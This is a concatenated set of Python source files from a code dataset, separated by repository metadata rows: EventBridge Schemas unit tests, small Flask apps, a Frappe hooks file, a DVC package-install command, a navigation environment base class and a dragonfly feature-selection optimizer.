"Content": '{"components":{"schemas":{"AWSEvent":{"properties":{"account":{"type":"string"},"detail":{"$ref":"#/components/schemas/ParameterStoreChange"},'
'"detail-type":{"type":"string"},"id":{"type":"string"},"region":{"type":"string"},"resources":{"items":{"type":"string"},"type":"array"},'
'"source":{"type":"string"},"time":{"format":"date-time","type":"string"},"version":{"type":"string"}},"required":["detail-type","resources",'
'"detail","id","source","time","region","version","account"],"type":"object","x-amazon-events-detail-type":"Parameter Store Change",'
'"x-amazon-events-source":"aws.ssm"},"ParameterStoreChange":{"properties":{"description":{"type":"string"},"fromVersion":{"type":"string"},'
'"label":{"type":"string"},"name":{"type":"string"},"operation":{"type":"string"},"toVersion":{"type":"string"},"type":{"type":"string"}},'
'"required":["name","type","operation"],"type":"object"}}},"info":{"title":"ParameterStoreChange","version":"1.0.0",'
'"x-amazon-schemas-generated-code-hierarchy":"schema/aws/ssm/parameterstorechange"},"openapi":"3.0.0","paths":{}}',
"VersionCreatedDate": "2019-11-25T20:33:14Z",
"SchemaName": "aws.ssm@ParameterStoreChange",
"Type": "OpenApi3",
"SchemaVersion": "1",
}
registry_name = "registry1"
schema_name = "aws.ssm@ParameterStoreChange"
schemas_api_caller = SchemasApiCaller(self.client)
get_schema_metadata_response = schemas_api_caller.get_schema_metadata(registry_name, schema_name)
self.assertEqual(get_schema_metadata_response["event_source"], "aws.ssm")
self.assertEqual(get_schema_metadata_response["event_source_detail_type"], "Parameter Store Change")
self.assertEqual(get_schema_metadata_response["schema_root_name"], "ParameterStoreChange")
self.assertEqual(
"schema.aws.ssm.parameterstorechange", get_schema_metadata_response["schemas_package_hierarchy"]
)
self.client.describe_schema.assert_called_once_with(RegistryName=registry_name, SchemaName=schema_name)
def test_get_schema_metadata_3p_schema(self):
self.client.describe_schema.return_value = {
"SchemaArn": "arn:aws:schemas:us-east-1:434418839121:schema/discovered-schemas/order@NewOrder",
"Tags": {},
"LastModified": "2019-11-22T01:38:02Z",
"Content": '{"openapi":"3.0.0","info":{"version":"1.0.0","title":"NewOrder"},"paths":{},"components":{"schemas":{"AWSEvent":{"type":"object",'
'"required":["detail-type","resources","detail","id","source","time","region","version","account"],"x-amazon-events-detail-type":"NewOrder",'
'"x-amazon-events-source":"order","properties":{"detail":{"$ref":"#/components/schemas/NewOrder"},"account":{"type":"string"},"detail-type":{'
'"type":"string"},"id":{"type":"string"},"region":{"type":"string"},"resources":{"type":"array","items":{"type":"object"}},'
'"source":{"type":"string"},"time":{"type":"string","format":"date-time"},"version":{"type":"string"}}},"NewOrder":{"type":"object",'
'"required":["productId","orderId","customer"],"properties":{"customer":{"$ref":"#/components/schemas/Customer"},"orderId":{"type":"string"},'
'"productId":{"type":"string"}}},"Customer":{"type":"object","required":["zip","country","firstName","lastName","city","street"],'
'"properties":{"city":{"type":"string"},"country":{"type":"string"},"firstName":{"type":"string"},"lastName":{"type":"string"},'
'"street":{"type":"string"},"zip":{"type":"string"}}}}}}',
"VersionCreatedDate": "2019-11-22T01:49:50Z",
"SchemaName": "order@NewOrder",
"Type": "OpenApi3",
"SchemaVersion": "9",
}
registry_name = "registry1"
schema_name = "order@NewOrder"
schemas_api_caller = SchemasApiCaller(self.client)
get_schema_metadata_response = schemas_api_caller.get_schema_metadata(registry_name, schema_name)
self.assertEqual("order", get_schema_metadata_response["event_source"])
self.assertEqual("NewOrder", get_schema_metadata_response["event_source_detail_type"])
self.assertEqual("NewOrder", get_schema_metadata_response["schema_root_name"])
self.assertEqual("schema.order.neworder", get_schema_metadata_response["schemas_package_hierarchy"])
self.client.describe_schema.assert_called_once_with(RegistryName=registry_name, SchemaName=schema_name)
def test_get_schema_metadata_2p_schema_with_one_type(self):
self.client.describe_schema.return_value = {
"openapi": "3.0.0",
"info": {"version": "1.0.0", "title": "SomeAwesomeSchema"},
"paths": {},
"Content": '{"components":{"schemas":{"Some Awesome Schema":{"type":"object","required":["foo","bar","baz"],"properties":{"foo":{"type":"string"},'
'"bar":{"type":"string"},"baz":{"type":"string"}}}}}}',
"SchemaName": "2PSchema1",
}
registry_name = "registry1"
schema_name = "2PSchema1"
schemas_api_caller = SchemasApiCaller(self.client)
get_schema_metadata_response = schemas_api_caller.get_schema_metadata(registry_name, schema_name)
self.assertEqual(get_schema_metadata_response["event_source"], DEFAULT_EVENT_SOURCE)
self.assertEqual(get_schema_metadata_response["event_source_detail_type"], DEFAULT_EVENT_DETAIL_TYPE)
self.assertEqual(get_schema_metadata_response["schema_root_name"], "Some_Awesome_Schema")
self.assertEqual(get_schema_metadata_response["schemas_package_hierarchy"], "schema.2pschema1")
self.client.describe_schema.assert_called_once_with(RegistryName=registry_name, SchemaName=schema_name)
def test_get_schema_metadata_2p_schema_with_multiple_type(self):
self.client.describe_schema.return_value = {
"openapi": "3.0.0",
"info": {"version": "1.0.0", "title": "SomeAwesomeSchema"},
"paths": {},
"Content": r'{"components":{"schemas":{"Some\/Awesome\/Schema.Object.1":{"type":"object","required":["foo","bar","baz"],"properties":{"foo":{"type":"string"},'
r'"bar":{"type":"string"},"baz":{"type":"string"}}},"Some\/Awesome\/Schema.Object$2":{"type":"object","required":["foo","bar","baz"],'
'"properties":{"foo":{"type":"string"},"bar":{"type":"string"},"baz":{"type":"string"}}}}}}',
}
registry_name = "registry1"
schema_name = "schema1"
schemas_api_caller = SchemasApiCaller(self.client)
get_schema_metadata_response = schemas_api_caller.get_schema_metadata(registry_name, schema_name)
self.assertEqual(get_schema_metadata_response["event_source"], DEFAULT_EVENT_SOURCE)
self.assertEqual(get_schema_metadata_response["event_source_detail_type"], DEFAULT_EVENT_DETAIL_TYPE)
self.assertEqual(get_schema_metadata_response["schema_root_name"], "Some_Awesome_Schema_Object_1")
self.assertEqual(get_schema_metadata_response["schemas_package_hierarchy"], "schema.schema1")
self.client.describe_schema.assert_called_once_with(RegistryName=registry_name, SchemaName=schema_name)
def test_get_schema_metadata_content_not_serializable_raises_exception(self):
self.client.describe_schema.return_value = {
"ResponseMetadata": {
"RequestId": "389418ee-4e15-480a-8459-6c7640de7a26",
"HTTPStatusCode": 200,
"HTTPHeaders": {
"date": "Tue, 29 Oct 2019 07:20:32 GMT",
"content-type": "application/json",
"content-length": "3767",
"connection": "keep-alive",
"x-amzn-requestid": "389418ee-4e15-480a-8459-6c7640de7a26",
"x-amz-apigw-id": "CUE6AG_wvHcFyWA=",
"x-amzn-trace-id": "Root=1-5db7e83f-2c8e2cd03edc82ec7af0946c;Sampled=0",
},
"RetryAttempts": 0,
},
"Content": '{\n openapi" : "3.0.0",\n "info" : {\n "version" : "1.0.0",\n "title" : '
'"CodeCommitPullRequestStateChange"\n },\n "paths" : { },\n "components" : {\n "schemas" '
': {\n "AWSEvent" : {\n "type" : "object",\n "required" : [ "detail-type", '
'"resources", "id", "source", "time", "detail", "region", "version", "account" ],'
'\n "x-amazon-events-detail-type" : "CodeCommit Pull Request State Change",'
'\n "x-amazon-events-source" : "aws.codecommit",\n "properties" : {\n '
'"detail" : {\n "$ref" : "#/components/schemas/CodeCommitPullRequestStateChange"\n '
' },\n "detail-type" : {\n "type" : "string"\n },'
'\n "resources" : {\n "type" : "array",\n "items" : {\n '
' "type" : "string"\n }\n },\n "id" : {\n "type" : '
'"string"\n },\n "source" : {\n "type" : "string"\n },'
'\n "time" : {\n "type" : "string",\n "format" : "date-time"\n '
' },\n "region" : {\n "type" : "string",\n "enum" : [ '
'"ap-south-1", "eu-west-3", "eu-north-1", "eu-west-2", "eu-west-1", "ap-northeast-2", '
'"ap-northeast-1", "me-south-1", "sa-east-1", "ca-central-1", "ap-east-1", "cn-north-1", '
'"us-gov-west-1", "ap-southeast-1", "ap-southeast-2", "eu-central-1", "us-east-1", '
'"us-west-1", "cn-northwest-1", "us-west-2" ]\n },\n "version" : {\n '
' "type" : "string"\n },\n "account" : {\n "type" : "string"\n '
' }\n }\n },\n "CodeCommitPullRequestStateChange" : {\n "type" '
': "object",\n "required" : [ "sourceReference", "lastModifiedDate", "author", '
'"pullRequestStatus", "isMerged", "notificationBody", "destinationReference", "pullRequestId", '
'"callerUserArn", "title", "creationDate", "repositoryNames", "destinationCommit", "event", '
'"sourceCommit" ],\n "properties" : {\n "sourceReference" : {\n '
'"type" : "string"\n },\n "lastModifiedDate" : {\n "type" : '
'"string"\n },\n "author" : {\n "type" : "string"\n },'
'\n "pullRequestStatus" : {\n "type" : "string"\n },\n '
'"isMerged" : {\n "type" : "string"\n },\n "notificationBody" : {'
'\n "type" : "string"\n },\n "destinationReference" : {\n '
' "type" : "string"\n },\n "pullRequestId" : {\n "type" : '
'"string"\n },\n "callerUserArn" : {\n "type" : "string"\n '
' },\n "title" : {\n "type" : "string"\n },\n '
'"creationDate" : {\n "type" : "string"\n },\n "repositoryNames" '
': {\n "type" : "array",\n "items" : {\n "type" : '
'"string"\n }\n },\n "destinationCommit" : {\n "type" '
': "string"\n },\n "event" : {\n "type" : "string"\n },'
'\n "sourceCommit" : {\n "type" : "string"\n }\n }\n '
"}\n }\n }\n}\n",
"LastModified": "LastModified",
"SchemaArn": "",
"SchemaName": "aws.codecommit.CodeCommitPullRequestStateChange",
"SchemaVersion": "1",
"Type": "OpenApi3",
"VersionCreatedDate": "VersionCreatedDate",
}
registry_name = "registry1"
schema_name = "schema1"
schemas_api_caller = SchemasApiCaller(self.client)
with self.assertRaises(SchemasApiException):
schemas_api_caller.get_schema_metadata(registry_name, schema_name)
def test_get_schema_metadata_raises_not_available_in_region_exception(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.describe_schema.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.get_schema_metadata("registry-name", "schema-name")
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
def test_get_latest_schema_version(self):
registry_name = "registry1"
schema_name = "schema1"
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = True
self.client.get_paginator.return_value.paginate.return_value = [
{
"ResponseMetadata": {},
"SchemaVersions": [
{"SchemaName": "schema1", "SchemaVersion": "1"},
{"SchemaName": "schema1", "SchemaVersion": "2"},
{"SchemaName": "schema1", "SchemaVersion": "3"},
],
}
]
get_latest_schema_version_response = schemas_api_caller.get_latest_schema_version(registry_name, schema_name)
self.assertEqual(get_latest_schema_version_response, "3")
self.client.get_paginator.assert_called_once()
self.client.get_paginator.assert_called_once_with("list_schema_versions")
self.client.get_paginator.return_value.paginate.assert_called_once_with(
RegistryName=registry_name, SchemaName=schema_name, PaginationConfig={"StartingToken": None}
)
def test_get_latest_schema_version_raises_not_available_in_region_exception(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = False
self.client.get_paginator.return_value.paginate.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.get_latest_schema_version("registry-name", "schema-name")
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
def test_list_registries_throws_exception_when_result_set_is_empty(self):
max_items = 10
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = True
self.client.get_paginator.return_value.paginate.return_value = []
with self.assertRaises(ResourceNotFound) as ctx:
schemas_api_caller.list_registries(None, max_items)
msg = "No Registries found. This should not be possible, please raise an issue."
self.assertEqual(str(ctx.exception), msg)
def test_list_schemas_throws_exception_when_result_set_is_empty(self):
max_items = 10
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = True
self.client.get_paginator.return_value.paginate.return_value = []
with self.assertRaises(ResourceNotFound) as ctx:
schemas_api_caller.list_schemas("aws.events", None, max_items)
msg = "No Schemas found for registry %s" % "aws.events"
self.assertEqual(str(ctx.exception), msg)
def test_download_source_code_binding(self):
response = io.BytesIO(b"some initial binary data: \x00\x01")
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_code_binding_source.return_value = {"Body": response}
with tempfile.TemporaryFile() as download_dir:
schemas_api_caller.download_source_code_binding(
"Java8", "aws.events", "aws.batch.BatchJobStateChange", "1", download_dir
)
def test_download_source_code_binding(self):
response = io.BytesIO(b"some initial binary data: \x00\x01")
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_code_binding_source.return_value = {"Body": response}
with tempfile.TemporaryFile() as download_dir:
schemas_api_caller.download_source_code_binding(
"Java8", "aws.events", "aws.batch.BatchJobStateChange", "1", download_dir
)
def test_download_source_code_binding_raises_not_available_in_region_exception(self):
response = io.BytesIO(b"some initial binary data: \x00\x01")
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_code_binding_source.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.download_source_code_binding(
"Java8", "aws.events", "aws.batch.BatchJobStateChange", "1", "download_dir"
)
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
def test_put_code_binding_with_conflict_exception(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.put_code_binding.side_effect = [
botocore.exceptions.ClientError(
{"Error": {"Code": "ConflictException", "Message": "ConflictException"}}, "operation"
)
]
schemas_api_caller.put_code_binding("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
self.client.put_code_binding.assert_called_once_with(
Language="Java8", RegistryName="aws.events", SchemaName="aws.batch.BatchJobStateChange", SchemaVersion="1"
)
def test_put_code_binding_with_not_found_exception(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.put_code_binding.side_effect = [
botocore.exceptions.ClientError(
{"Error": {"Code": "NotFoundException", "Message": "NotFoundException"}}, "operation"
)
]
with self.assertRaises(Exception):
schemas_api_caller.put_code_binding("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
def test_put_code_binding_raises_not_available_in_region_exception(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.put_code_binding.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.put_code_binding("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
def test_poll_for_code_generation_completion(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_waiter.return_value.wait.return_value = None
schemas_api_caller.poll_for_code_binding_status("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
def test_poll_for_code_generation_completion_with_failed_status(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_waiter.return_value.wait.return_value = None
schemas_api_caller.poll_for_code_binding_status("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_waiter.return_value.wait.side_effect = WaiterError(
name="failed", reason="Waiter encountered a terminal failure state", last_response="failed"
)
with self.assertRaises(WaiterError):
schemas_api_caller.poll_for_code_binding_status("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
def test_poll_for_code_generation_completion_raises_not_available_in_region_exception(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_waiter.return_value.wait.return_value = None
schemas_api_caller.poll_for_code_binding_status("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_waiter.return_value.wait.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.poll_for_code_binding_status("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
| 57.957282 | 171 | 0.615586 |
89c42b7c4edbffece3c822fb68e5f419cefc32a6 | 1,677 | py | Python | dyslexia/app/api.py | SharonBrg/batch9_dyslexia | 97d1584ca9e0e834a311e98d7fd3549ae0901328 | [
"MIT"
] | null | null | null | dyslexia/app/api.py | SharonBrg/batch9_dyslexia | 97d1584ca9e0e834a311e98d7fd3549ae0901328 | [
"MIT"
] | null | null | null | dyslexia/app/api.py | SharonBrg/batch9_dyslexia | 97d1584ca9e0e834a311e98d7fd3549ae0901328 | [
"MIT"
] | null | null | null | from dyslexia.app import pipeline
from dyslexia.app.errors import NoTextFoundError, ImageBlurryError
from dyslexia.io import load_image_from_string
from PIL import Image
from io import BytesIO
import numpy as np
def load_image_into_numpy_array(data):
return np.array(Image.open(BytesIO(data)))
def get_results(data) -> dict:
"""Executes the pipeline function that requires a valid path
If the pipeline is executed successfully then it returns
a dictionnary with 2 keys : 'paragraphs' that contains a list of text and
'bboxes' containing coordinates (x1,y1,w,h) for each paragraph
Else there are 3 possibles errors :
1. The image is blurry
2. No french text found in the output
3. Unknown error
Parameters
----------
data: str or uploaded file
input data from API call it can be a string (url or path to file)
or the stream of the uploaded image
Returns
-------
dict
dictionnary with 2 keys : 'paragraphs' that contains a list of text and
'bboxes' containing coordinates (x1,y1,w,h) for each paragraph
"""
try:
if isinstance(data, str):
img = load_image_from_string(data)
else:
img = load_image_into_numpy_array(data)
txt, bboxes = pipeline(img)
except ImageBlurryError as e:
return {'error': {'code': 'IMAGE_BLURRY', 'message': str(e)}}
except NoTextFoundError as e:
return {'error': {'code': 'NO_TEXT_FOUND', 'message': str(e)}}
except Exception as e:
return {'error': {'code': 'UNKNOWN_ERROR', 'message': str(e)}}
res = {'paragraphs': txt, 'bboxes': bboxes}
return res | 29.421053 | 79 | 0.665474 |
559069d2a2f804d1795ae1c149d30702d5375349 | 3,785 | py | Python | membershipmanagement/hooks.py | parthagrawal9/MembershipManagement | 11a61475a135da4d73efdfbd742b79b4ed261a0f | [
"MIT"
] | null | null | null | membershipmanagement/hooks.py | parthagrawal9/MembershipManagement | 11a61475a135da4d73efdfbd742b79b4ed261a0f | [
"MIT"
] | null | null | null | membershipmanagement/hooks.py | parthagrawal9/MembershipManagement | 11a61475a135da4d73efdfbd742b79b4ed261a0f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from . import __version__ as app_version
app_name = "membershipmanagement"
app_title = "Members"
app_publisher = "Parth - M20Zero"
app_description = "Membership Management System"
app_icon = "octicon octicon-file-directory"
app_color = "grey"
app_email = "agrawal.parth9@gmail.com"
app_license = "MIT"
# Includes in <head>
# ------------------
# include js, css files in header of desk.html
# app_include_css = "/assets/membershipmanagement/css/membershipmanagement.css"
# app_include_js = "/assets/membershipmanagement/js/membershipmanagement.js"
# include js, css files in header of web template
# web_include_css = "/assets/membershipmanagement/css/membershipmanagement.css"
# web_include_js = "/assets/membershipmanagement/js/membershipmanagement.js"
# include js in page
# page_js = {"page" : "public/js/file.js"}
# include js in doctype views
# doctype_js = {"doctype" : "public/js/doctype.js"}
# doctype_list_js = {"doctype" : "public/js/doctype_list.js"}
# doctype_tree_js = {"doctype" : "public/js/doctype_tree.js"}
# doctype_calendar_js = {"doctype" : "public/js/doctype_calendar.js"}
# Home Pages
# ----------
# application home page (will override Website Settings)
# home_page = "login"
# website user home page (by Role)
# role_home_page = {
# "Role": "home_page"
# }
# Website user home page (by function)
# get_website_user_home_page = "membershipmanagement.utils.get_home_page"
# Generators
# ----------
# automatically create page for each record of this doctype
# website_generators = ["Web Page"]
# Installation
# ------------
# before_install = "membershipmanagement.install.before_install"
# after_install = "membershipmanagement.install.after_install"
# Desk Notifications
# ------------------
# See frappe.core.notifications.get_notification_config
# notification_config = "membershipmanagement.notifications.get_notification_config"
# Permissions
# -----------
# Permissions evaluated in scripted ways
# permission_query_conditions = {
# "Event": "frappe.desk.doctype.event.event.get_permission_query_conditions",
# }
#
# has_permission = {
# "Event": "frappe.desk.doctype.event.event.has_permission",
# }
# Document Events
# ---------------
# Hook on document methods and events
doc_events={
"Member":{
"after_insert": "membershipmanagement.api.new_member"
},
"Member Request":{
"after_insert": "membershipmanagement.api.new_membership_request",
"on_update": "membershipmanagement.api.membership_state_change",
}#,
# "Email Queue":{
# "after_insert": "membershipmanagement.api.email_queue_send_now"
# }
}
# doc_events = {
# "*": {
# "on_update": "method",
# "on_cancel": "method",
# "on_trash": "method"
# }
# }
# Scheduled Tasks
# ---------------
scheduler_events = {
"daily": [
"membershipmanagement.tasks.daily"
]
}
# scheduler_events = {
# "all": [
# "membershipmanagement.tasks.all"
# ],
# "daily": [
# "membershipmanagement.tasks.daily"
# ],
# "hourly": [
# "membershipmanagement.tasks.hourly"
# ],
# "weekly": [
# "membershipmanagement.tasks.weekly"
# ]
# "monthly": [
# "membershipmanagement.tasks.monthly"
# ]
# }
# Testing
# -------
# before_tests = "membershipmanagement.install.before_tests"
# Overriding Methods
# ------------------------------
#
# override_whitelisted_methods = {
# "frappe.desk.doctype.event.event.get_events": "membershipmanagement.event.get_events"
# }
#
# each overriding function accepts a `data` argument;
# generated from the base implementation of the doctype dashboard,
# along with any modifications made in other Frappe apps
# override_doctype_dashboards = {
# "Task": "membershipmanagement.task.get_dashboard_data"
# }
| 25.066225 | 88 | 0.692734 |
8310e7b4d71b5e1bfb1b1c40cd7d107e4de10bf9 | 1,851 | py | Python | flask_api.py | IK-R-S/flask-api | fd5b1b56181c9272e62326a064e6c10eb2727db3 | [
"MIT"
] | 2 | 2021-11-06T15:12:22.000Z | 2022-02-28T22:43:42.000Z | flask_api.py | IK-R-S/flask-api | fd5b1b56181c9272e62326a064e6c10eb2727db3 | [
"MIT"
] | null | null | null | flask_api.py | IK-R-S/flask-api | fd5b1b56181c9272e62326a064e6c10eb2727db3 | [
"MIT"
] | null | null | null | import requests
from flask import Flask, request, jsonify
app = Flask(__name__)
@app.route("/")
def home():
return """
<h1>Bem vindo ao exemplo básico de API com Flask!</h1>
<p>Nesse exemplo você pode explorar as seguintes rotas, algumas delas com parâmetros:</p>
<li><a href="/olamundo">Olá mundo no flask 🌎</a></li>
<li><a href="/boasvindas/">Boas vindas dinâmico 😃</a></li>
<li><a href="/soma/">Soma de 2 números 🔢</a></li>
<li><a href="/jsoncalc/">Resposta em JSON 📃</a></li>
<text style="margin-top: 10">by: @IK.R.S</text>
"""
@app.route("/olamundo/")
def hello():
return "Olá mundo"
@app.route("/boasvindas/")
def boasvindas():
return "Escreva seu nome no endereço. exemplo: http://127.0.0.1:4444/boasvindas/Maria"
@app.route("/boasvindas/<nome>")
def bemvindo(nome):
return f"Olá {nome}, seja bem vindo a API Flask!"
@app.route("/soma/")
def sum():
return """
<h2>Para somar escreva os números no endereço da seguinte forma: http://127.0.0.1:4444/soma/1/2</h3>
<p1>Neste exemplo os número foram 1 e 2; veja com 3 e 4: http://127.0.0.1:222/soma/3/4</p1>
"""
@app.route("/soma/<n1>/<n2>")
def sumnum(n1, n2):
sum = int(n1) + int(n2)
return f"SOMA ENTRE {n1} E {n2} = {sum}"
@app.route("/jsoncalc/")
def jsoncalc():
return """
<h2>Para receber os dados em JSON escreva os números no endereço da seguinte forma: http://127.0.0.1:4444/jsoncalc/1/2</h3>
<p1>Neste exemplo os número foram 1 e 2; veja com 3 e 4: http://127.0.0.1:222/jsoncalc/3/4</p1>
"""
@app.route("/jsoncalc/<n1>/<n2>")
def calc(n1, n2):
n1 = int(n1)
n2 = int(n2)
soma = n1 + n2
sub = n1 - n2
mult = n1 * n2
div = n1 / n2
return jsonify({"soma": soma, "subtracao": sub, "multiplicacao": mult, "divisao": div})
app.run(port="4444", debug=False)
| 28.921875 | 127 | 0.615343 |
7b2bccc0f9db1d3a3646604f94ac9c330a27494b | 2,674 | py | Python | dvc/command/pkg.py | zb0th/dvc | 5fdbc1882f73162419d5b84ed47a33e9e321f151 | [
"Apache-2.0"
] | 1 | 2020-07-25T08:23:32.000Z | 2020-07-25T08:23:32.000Z | dvc/command/pkg.py | aliseramirez/dvc | 92cc9f7e6f19f3b92f43e28131fe50c20b297214 | [
"Apache-2.0"
] | null | null | null | dvc/command/pkg.py | aliseramirez/dvc | 92cc9f7e6f19f3b92f43e28131fe50c20b297214 | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
import argparse
import logging
from dvc.exceptions import DvcException
from dvc.command.base import CmdBase, fix_subparsers, append_doc_link
logger = logging.getLogger(__name__)
class CmdPkgInstall(CmdBase):
def run(self):
try:
self.repo.pkg.install(
self.args.address,
self.args.target_dir,
self.args.select,
self.args.file,
)
return 0
except DvcException:
logger.exception(
"failed to install package '{}'".format(self.args.address)
)
return 1
def add_parser(subparsers, parent_parser):
from dvc.command.config import parent_config_parser
PKG_HELP = "Manage DVC packages."
pkg_parser = subparsers.add_parser(
"pkg",
parents=[parent_parser],
description=append_doc_link(PKG_HELP, "pkg"),
formatter_class=argparse.RawDescriptionHelpFormatter,
add_help=False,
)
pkg_subparsers = pkg_parser.add_subparsers(
dest="cmd", help="Use dvc pkg CMD --help for command-specific help."
)
fix_subparsers(pkg_subparsers)
PKG_INSTALL_HELP = "Install package."
pkg_install_parser = pkg_subparsers.add_parser(
"install",
parents=[parent_config_parser, parent_parser],
description=append_doc_link(PKG_INSTALL_HELP, "pkg-install"),
help=PKG_INSTALL_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
pkg_install_parser.add_argument(
"address",
nargs="?",
default="",
help="Package address: git://<url> or https://github.com/...",
)
pkg_install_parser.add_argument(
"target_dir",
metavar="target",
nargs="?",
default=".",
help="Target directory to deploy package outputs. "
"Default value is the current dir.",
)
pkg_install_parser.add_argument(
"-s",
"--select",
metavar="OUT",
action="append",
default=[],
help="Select and persist only specified outputs from a package. "
"The parameter can be used multiple times. "
"All outputs will be selected by default.",
)
pkg_install_parser.add_argument(
"-f",
"--file",
help="Specify name of the stage file. It should be "
"either 'Dvcfile' or have a '.dvc' suffix (e.g. "
"'prepare.dvc', 'clean.dvc', etc). "
"By default the file has 'mod_' prefix and imported package name "
"followed by .dvc",
)
pkg_install_parser.set_defaults(func=CmdPkgInstall)
| 29.711111 | 76 | 0.618175 |
1444af2072201f142ac237687dca77258cdf9cdf | 1,843 | py | Python | gennav/envs/base.py | threewisemonkeys-as/gennav | 41e86b841a0ce44402f31debc65d5c82109b13a3 | [
"MIT"
] | null | null | null | gennav/envs/base.py | threewisemonkeys-as/gennav | 41e86b841a0ce44402f31debc65d5c82109b13a3 | [
"MIT"
] | null | null | null | gennav/envs/base.py | threewisemonkeys-as/gennav | 41e86b841a0ce44402f31debc65d5c82109b13a3 | [
"MIT"
] | null | null | null | class Environment(object):
"""
Base class for an envrionment.
An environment object should encapsulate all data processing
related to a specific environment representation and should
provide the ability to check for collision using this API
"""
def get_status(self, state):
""" Get whether a given state is valid within the environment.
This method needs to be implemented in the specific env implementation.
Args:
state (gennav.utils.RobotState): State to be checked
Returns:
bool: True if state is valid otherwise False
"""
raise NotImplementedError
def get_traj_status(self, traj):
""" Get whether a given trajectory is valid within the environment.
This method needs to be implemented in the specific env implementation.
Args:
state (gennav.utils.Trajectory): Trajectory to be checked
Returns:
bool: True if state is valid otherwise False
"""
raise NotImplementedError
def update(self, *args, **kwargs):
""" Update the environment.
This method needs to be implemented in the specific env implementation.
Args:
*args: Variable length argument list.
**kwargs: Arbitrary keyword arguments.
"""
raise NotImplementedError
def nearest_obstacle_distance(self, state, *args, **kwargs):
""" Get the distacne to nearest obstacle.
This method needs to be implemented in the specific env implementation
Args:
state (gennav.utils.common.RobotState) : The current state of the robot.
*args: Variable length argument list
**kwargs: Variable length keyword arguments.
"""
raise NotImplementedError
| 30.716667 | 84 | 0.640803 |
108fb0a494ed3eeac305be8125ced8fbd2efd592 | 7,667 | py | Python | zoofs/dragonflyoptimization.py | ganesh3/zoofs | 8f2109b5316d4b1ab42f25419dd80ae1d0582e89 | [
"Apache-2.0"
] | null | null | null | zoofs/dragonflyoptimization.py | ganesh3/zoofs | 8f2109b5316d4b1ab42f25419dd80ae1d0582e89 | [
"Apache-2.0"
] | null | null | null | zoofs/dragonflyoptimization.py | ganesh3/zoofs | 8f2109b5316d4b1ab42f25419dd80ae1d0582e89 | [
"Apache-2.0"
] | null | null | null | import plotly.graph_objects as go
from zoofs.baseoptimizationalgorithm import BaseOptimizationAlgorithm
import numpy as np
import pandas as pd
import logging as log
class DragonFlyOptimization(BaseOptimizationAlgorithm):
"""
Dragon Fly Optimization
Parameters
----------
objective_function: user made function of the signature 'func(model,X_train,y_train,X_test,y_test)'
User defined function that returns the objective value
population_size: int, default=50
Total size of the population
n_iteration: int, default=50
Number of time the Particle Swarm Optimization algorithm will run
minimize : bool, default=True
Defines if the objective value is to be maximized or minimized
Attributes
----------
best_feature_list : ndarray of shape (n_features)
list of features with the best result of the entire run
"""
def __init__(self,objective_function,n_iteration=50,population_size=50,minimize=True):
super().__init__(objective_function,n_iteration,population_size,minimize)
def evaluate_fitness(self,model,X_train,y_train,X_valid,y_valid):
scores = []
for i,individual in enumerate(self.individuals):
chosen_features = [index for index in range(X_train.shape[1]) if individual[index]==1]
X_train_copy = X_train.iloc[:,chosen_features]
X_valid_copy = X_valid.iloc[:,chosen_features]
score = self.objective_function(model,X_train_copy,y_train,X_valid_copy,y_valid)
if not(self.minimize):
score=-score
if score< self.best_score:
self.best_score=score
self.best_score_dimension=individual
self.best_dim=individual
if score> self.worst_score:
self.worst_score=score
self.worst_dim=individual
scores.append(score)
return scores
def _check_params(self,model,X_train,y_train,X_valid,y_valid,method):
super()._check_params(model,X_train,y_train,X_valid,y_valid)
